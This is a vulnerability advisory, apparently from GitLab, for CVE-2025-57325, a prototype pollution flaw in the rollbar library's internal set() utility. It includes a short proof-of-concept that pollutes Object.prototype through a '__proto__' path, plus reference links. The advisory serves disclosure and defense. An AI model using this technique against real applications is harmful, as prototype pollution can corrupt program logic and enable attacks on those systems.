CVE-2025-57325: rollbar vulnerable to prototype pollution
(updated )
Prototype pollution potential with the utility function rollbar/src/utility.set(). No impact when using the published public interface.
If application code directly imports set from rollbar/src/utility and then calls set with untrusted input in the second argument, it is vulnerable to prototype pollution.
POC:
const obj = {};
require("rollbar/src/utility").set(obj, "__proto__.polluted", "vulnerable");
console.log({}.polluted !== undefined ? '[POLLUTION_TRIGGERED]':'');
References
- github.com/VulnSageAgent/PoCs/blob/main/JavaScript/prototype-pollution/rollbar%402.26.4/index.js
- github.com/VulnSageAgent/PoCs/tree/main/JavaScript/prototype-pollution/CVE-2025-57325
- github.com/advisories/GHSA-r8c2-2qwq-94p6
- github.com/rollbar/rollbar.js
- github.com/rollbar/rollbar.js/commit/d717def8b68f4a947975d0aebb729869cdb2d343
- github.com/rollbar/rollbar.js/issues/1333
- github.com/rollbar/rollbar.js/security/advisories/GHSA-r8c2-2qwq-94p6
- nvd.nist.gov/vuln/detail/CVE-2025-57325
Code Behaviors & Features
Detect and mitigate CVE-2025-57325 with GitLab Dependency Scanning
Secure your software supply chain by verifying that all open source dependencies used in your projects contain no disclosed vulnerabilities. Learn more about Dependency Scanning →